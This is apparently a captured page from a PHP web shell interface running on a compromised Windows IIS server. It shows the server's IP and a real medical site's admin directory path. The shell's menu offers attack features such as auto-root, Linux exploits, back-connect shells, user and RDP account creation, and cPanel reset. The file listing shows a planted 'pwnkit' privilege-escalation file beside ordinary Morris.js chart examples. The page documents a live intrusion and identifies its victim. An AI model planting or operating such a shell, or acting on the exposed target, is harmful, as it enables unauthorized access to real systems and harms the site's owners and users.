Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 3.21.159.11
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
morris.js /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
_template.html
708
B
-rw-rw-rw-
area-as-line.html
1
KB
-rw-rw-rw-
area.html
1.07
KB
-rw-rw-rw-
bar-colors.html
1.22
KB
-rw-rw-rw-
bar-no-axes.html
1001
B
-rw-rw-rw-
bar.html
1.02
KB
-rw-rw-rw-
days.html
1.52
KB
-rw-rw-rw-
decimal-custom-hover.html
1.16
KB
-rw-rw-rw-
diagonal-xlabels-bar.html
1.55
KB
-rw-rw-rw-
diagonal-xlabels.html
1.54
KB
-rw-rw-rw-
donut-colors.html
1.09
KB
-rw-rw-rw-
donut-formatter.html
1.04
KB
-rw-rw-rw-
donut.html
997
B
-rw-rw-rw-
dst.html
1.01
KB
-rw-rw-rw-
events.html
2.45
KB
-rw-rw-rw-
goals.html
1006
B
-rw-rw-rw-
months-no-smooth.html
1.51
KB
-rw-rw-rw-
negative.html
1.16
KB
-rw-rw-rw-
no-grid.html
1.53
KB
-rw-rw-rw-
non-continuous.html
1.74
KB
-rw-rw-rw-
non-date.html
1.19
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
quarters.html
2.47
KB
-rw-rw-rw-
resize.html
1.61
KB
-rw-rw-rw-
stacked_bars.html
1011
B
-rw-rw-rw-
timestamps.html
1.59
KB
-rw-rw-rw-
updating.html
1.34
KB
-rw-rw-rw-
weeks.html
2.42
KB
-rw-rw-rw-
years.html
1.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bar-no-axes.html
<!doctype html> <head> <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/raphael/2.1.2/raphael-min.js"></script> <script src="../morris.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.js"></script> <script src="lib/example.js"></script> <link rel="stylesheet" href="lib/example.css"> <link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/prettify/r224/prettify.min.css"> <link rel="stylesheet" href="../morris.css"> </head> <body> <h1>Bar charts</h1> <div id="graph"></div> <pre id="code" class="prettyprint linenums"> // Use Morris.Bar Morris.Bar({ element: 'graph', axes: false, data: [ {x: '2011 Q1', y: 3, z: 2, a: 3}, {x: '2011 Q2', y: 2, z: null, a: 1}, {x: '2011 Q3', y: 0, z: 2, a: 4}, {x: '2011 Q4', y: 2, z: 4, a: 3} ], xkey: 'x', ykeys: ['y', 'z', 'a'], labels: ['Y', 'Z', 'A'] }); </pre> </body>
Close